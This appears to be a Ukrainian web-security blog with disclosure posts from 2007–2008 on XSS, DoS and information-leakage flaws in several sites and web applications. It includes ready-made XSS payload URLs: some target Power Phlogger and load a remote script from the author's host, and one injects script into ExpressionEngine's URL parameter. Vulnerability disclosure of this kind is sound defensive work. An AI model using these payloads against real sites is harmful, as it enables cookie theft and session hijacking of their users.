Websecurity - Веб безпека

11.02.2008

У липні, 11.07.2007, я знайшов Cross-Site Scripting уразливість на проекті http://shop.a.ua (пошук інтернет-магазинів порталу A.UA). Про що найближчим часом сповіщу адміністрацію проекту.

Останній раз стосовно проектів A.UA я писав про уразливості на ref.a.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

16.06.2008

XSS:

• alert(document.cookie)
• цікавий
• html включення

Дана уразливість досі не виправлена.

До раніше мною оприлюднених уразливостей в Power Phlogger, повідомляю про нові уразливості в даній системі для ведення статистики відвідувань. Деякий час тому, 17.05.2008 та 31.05.2008, я виявив Denial of Service, Information Leakage та Cross-Site Scripting уразливості в Power Phlogger. Про що найближчим часом повідомлю розробникам веб додатку.

DoS:

http://site/newaccount_self.php

Скрипт редиректить сам на себе (зациклений редирект). Mozilla автоматично зупиняє даний зациклений редирект (видає Redirect Loop Error), а IE - ні (продовжує звертатися до сервера). Якщо клієнт, що звертається до скрипта, сам не зупинить редирект, наприклад бот пошукових систем, то це спричинить велике навантаження на сервер.

Information Leakage:

http://site/main_location.inc

XSS:

http://site/dspLogs.php/%22%3E%3Cscript%20src=http://websecurity.com.ua/webtools/xss.js%20
http://site/dspStats.php/%22%3E%3Cscript%20src=http://websecurity.com.ua/webtools/xss.js%20
http://site/edCss.php/%22%3E%3Cscript%20src=http://websecurity.com.ua/webtools/xss.js%20

Дані XSS можливі в зв’язку з використанням в скриптах $PHP_SELF.

Уразлива версія Power Phlogger 2.2.5 та попередні версії.

Це шоста частина уразливостей в Power Phlogger. Найближчим часом напишу про інші уразливості в даному веб додатку.

В даній добірці уразливості в веб додатках:

• Calendarix version 0.7. 20070307 Multiple Path Disclosure Vulnerabilities (деталі)
• POWER PHLOGGER v.2.2.5 (username) SQL Injection (деталі)
• Flashbb <= 1.1.7 - Remote File Inclusion Exploit (деталі)
• Entertainment CMS Admin Login Bypass (деталі)
• SYSTONY’Cfr/portal/ actualites.asp sql injection (деталі)
• Infinity Solutions LLC e/description.asp sql injection (деталі)
• MERCURY/Templates mercury.ASP SQL Injection (деталі)
• Another You tube clone script vulnerability (деталі)
• CodeIgniter 1.5.3 vulnerabilities (деталі)
• Cross-Site Request Forgery (CSRF) vulnerability in Jportal 2.3.1 (деталі)

18.07.2007

У липні, 08.07.2007, я знайшов Cross-Site Scripting уразливість на проекті http://www.einnews.com - пошуковцю та агрегатору новин. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше.

13.06.2008

XSS:

• alert(document.cookie)

Дана уразливість вже виправлена.

В травні минулого року була виявлена Cross-Site Scripting уразливість в stats плагіні для WordPress.

Це persistent XSS уразливість, яка мала місце в плагіні stats, що дозволяє мати статистику відвідувань від wordpress.com. Уразливим було поле referer в статистиці, що накопичує плагін. Дана уразливість вже виправлена.

• Persistent cross-site scripting in wordpress.com dashboard (деталі)

В даній добірці уразливості в веб додатках:

• Updated webmin packages fix XSS vulnerability (деталі)
• SQL-ін’єкція, перегляд реквізитів доступу до БД в AJ HYIP (деталі)
• Overwrite variables eqDKP 1.3.2d and prior (login.php) (деталі)
• Vulnerability in phpTrafficA < 1.4.2 (деталі)
• Calendarix version 0.7. 20070307 Multiple Path Disclosure Vulnerabilities (деталі)
• MyNews version 0.10 SQL Injection Vulnerability (деталі)
• Calendarix version 0.7. 20070307 Multiple XSS Attacks (деталі)
• Calendarix version 0.7. 20070307 Multiple SQL Injection Vulnerabilities (деталі)
• Pluxml 0.3.1 Remote Code Execution Exploit (деталі)
• PHP-інклюдинг в BBClone (деталі)

08.05.2008

У жовтні, 16.10.2007, я знайшов Cross-Site Scripting уразливість в системі ExpressionEngine. Раніше я вже писав про уразливість в ExpressionEngine.

Деталі уразливості з’являться пізніше, спочатку повідомлю розробникам системи.

11.06.2008

Уразливість в скрипті index.php в параметрі URL, якщо включений meta-refresh редиректор.

XSS:

http://site/index.php?URL=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уразлива версія ExpressionEngine 1.3.1 та попередні. Починаючи з версії ExpressionEngine 1.4 уразливість вже виправлена, як повідомили мені розробники EE. Спочатку я виявив дану дірку на сайті з EE 1.6.0 (а потім 1.6.3), але як я вияснив на тому сайті використовувся старий index.php, тому вразливими є тільки версії EE до 1.3.1 включно.

Виявлена Cross-Site Scripting уразливість у F5 Firepass.

Уразливі версії: F5 FirePass 6.0.

Міжсайтовий скриптінг через сторінку керування захистом від міжсайтового скриптінга.

Дуже весела дірка . Це ще треба так вміти, щоб зробити XSS дірку в панелі керування захистом від XSS.

• F5 FirePass Content Inspection Management XSS (деталі)

В даній добірці уразливості в веб додатках:

• WSPortal version 1.0 SQL Injection Vulnerability (деталі)
• WSPortal version 1.0 Path Disclosure Vulnerability (деталі)
• H4CREW-000005 EasyNews Pro 4.0 XSS & CSRF (деталі)
• Sitellite cms <= 4.2.12 RFI Vuln (деталі)
• PhpListPro Persistent XSS Vulnerability (деталі)
• Papoo CMS - Multiple Cross Site Scripting (деталі)
• Orkut Server Side Session Management Error (деталі)
• eNdonesia 8.4 [multiple injection sql] (деталі)
• All Of the Mambo & Joomla Script Remote File Inclussion Bugs (деталі)
• Vulnerability in Kiwi CatTools (деталі)

07.02.2008

У липні, 08.07.2007, я знайшов Cross-Site Scripting уразливість в пошуковій системі http://www.godado.it. Про що найближчим часом сповіщу адміністрацію системи.

До речі, даний пошуковець використовує движок Ask.com (тому дана компанія також несе відповідальність за уразливість).

Детальна інформація про уразливість з’явиться пізніше.

09.06.2008

XSS:

• alert(document.cookie)

Дану уразливість вже виправили. Але зробили це лише частково, тому при невеличкій модифікації коду вона знову працює.

XSS:

• alert(document.cookie) (IE)
• alert(document.cookie) (Mozilla)
• цікавий (Mozilla)